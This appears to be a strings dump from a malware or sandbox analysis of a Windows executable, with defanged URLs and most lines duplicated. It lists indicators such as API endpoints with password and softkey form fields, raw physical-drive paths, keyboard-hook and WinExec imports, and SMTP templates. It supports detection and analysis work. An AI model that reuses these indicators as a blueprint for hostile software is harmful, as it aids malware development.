/UserHelper/xmlHttp_SetUserInfo.php
hXXp://api.ysdm.net/register.xml
hXXp://api.ysdm.net/register.xml
hXXp://api.ysdm.net/info.xml
hXXp://api.ysdm.net/info.xml
hXXp://api.ysdm.net/recharge.xml
hXXp://api.ysdm.net/recharge.xml
hXXp://api.ysdm.net/create.xml
hXXp://api.ysdm.net/create.xml
hXXp://api.ysdm.net/reporterror.xml
hXXp://api.ysdm.net/reporterror.xml
crText
crText
Report
Report
themepassword
themepassword
SysShadow.HostWnd
SysShadow.HostWnd
dwmapi.dll
dwmapi.dll
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
VBScript.RegExp
PasswordChar
PasswordChar
crTextSel
crTextSel
SysShadow.Menu
SysShadow.Menu
fiTXtXML:com.adobe.xmp
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> _
" id="W5M0MpCehiHzreSzNTczkc9d"?> _
" id="W5M0MpCehiHzreSzNTczkc9d"?> $GK
" id="W5M0MpCehiHzreSzNTczkc9d"?> $GK
&password=
&password=
&softkey=
&softkey=
Content-Disposition: form-data; name="password"
Content-Disposition: form-data; name="password"
{pass}
{pass}
Content-Disposition: form-data; name="softkey"
Content-Disposition: form-data; name="softkey"
{softkey}
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
SetClientCertificate
SetClientCertificate
Login
Login
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
Q%*.*f
Q%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
iphlpapi.dll
iphlpapi.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
RASAPI32.dll
RASAPI32.dll
RPCRT4.dll
RPCRT4.dll
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
GetViewportOrgEx
GetViewportOrgEx
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegCreateKeyExA
RegCreateKeyExA
COMCTL32.dll
COMCTL32.dll
WSOCK32.dll
WSOCK32.dll
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\Scsi0:
\\.\PhysicalDrive0
\\.\PhysicalDrive0
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
VVV.dywt.com.cn
VVV.dywt.com.cn
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
window %s handle %d
window %s handle %d
play %s from %d
play %s from %d
play %s
play %s
status %s position
status %s position
close %s
close %s
Bag pipe
Bag pipe
%d%d%d
%d%d%d
rundll32.exe shell32.dll,
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
The URL has moved here
The URL has moved here
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
c:\%original file name%.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
1.0.0.0
1.0.0.0
(*.*)
(*.*)
2.3.1.3
2.3.1.3
%original file name%.exe_1460_rwx_00E20000_00013000:
.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant
%original file name%.exe_1460_rwx_10001000_0002C000:
f9z.vk
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
Microsoft.XMLDOM
z>Advapi32.dll
advapi32.dll
kernel32.dll
ntdll.dll
user32.dll
gdi32.dll
ole32.dll
Ole32.dll
shell32.dll
atl.dll
GdiPlus.dll
GetProcessHeap
program internal error number is %d.
:"%s"
:"%s".
%:.NG2r8%4/h
.text
`.rdata
@.data
.rsrc
.reloc
number is %d.